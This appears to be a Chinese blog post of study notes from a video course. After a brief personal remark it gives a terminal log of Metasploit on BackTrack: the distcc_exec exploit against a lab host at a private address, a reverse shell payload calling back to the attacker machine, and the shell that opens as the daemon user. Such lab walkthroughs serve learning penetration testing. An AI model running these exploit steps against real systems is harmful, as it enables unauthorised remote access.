上個禮拜去旅遊,累出翔來了,真想不明白爲什麼那麼多人花錢去買罪受。今天更新一篇,最近在做51的視頻教程,旅游回來一直沒緩過來勁,這算是學習筆記吧。
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux System information as of Wed Jul 31 14:55:12 CST 2013 System load: 0.31 Processes: 149 Usage of /: 72.0% of 19.06GB Users logged in: 1 Memory usage: 25% IP address for eth0: 192.168.11.40 Swap usage: 3% => There is 1 zombie process. Graph this data and manage this system at https://landscape.canonical.com/ Last login: Wed Jul 31 14:31:36 2013 from 192.168.11.5 root@bt:~# root@bt:~# root@bt:~# msfpro [*] Starting Metasploit Console... _---------. .' ####### ;." .---,. ;@ @@`; .---,.. ." @@@@@'.,'@@ @@@@@',.'@@@@ ". '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' "--'.@@@ -.@ @ ,'- .'--" ".@' ; @ @ `. ;' |@@@@ @@@ @ . ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ '(.,...."/ =[ metasploit v4.6.2-1 [core:4.6 api:1.0] + -- --=[ 1138 exploits - 718 auxiliary - 194 post + -- --=[ 309 payloads - 30 encoders - 8 nops [*] Successfully loaded plugin: pro msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse PAYLOAD => cmd/unix/reverse msf exploit(distcc_exec) > show options Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 3632 yes The target port Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target msf exploit(distcc_exec) > set RHOST 192.168.11.17 RHOST => 192.168.11.17 msf exploit(distcc_exec) > set LHOST 192.168.11.40 LHOST => 192.168.11.40 msf exploit(distcc_exec) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo ruCpcMy2m0BrAfbq; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "ruCpcMy2m0BrAfbq\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.11.40:4444 -> 192.168.11.17:58472) at 2013-07-31 14:59:21 +0800 id uid=1(daemon) gid=1(daemon) groups=1(daemon) whoami daemon cd / ls bin boot cdrom dev etc home initrd initrd.img lib lost+found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz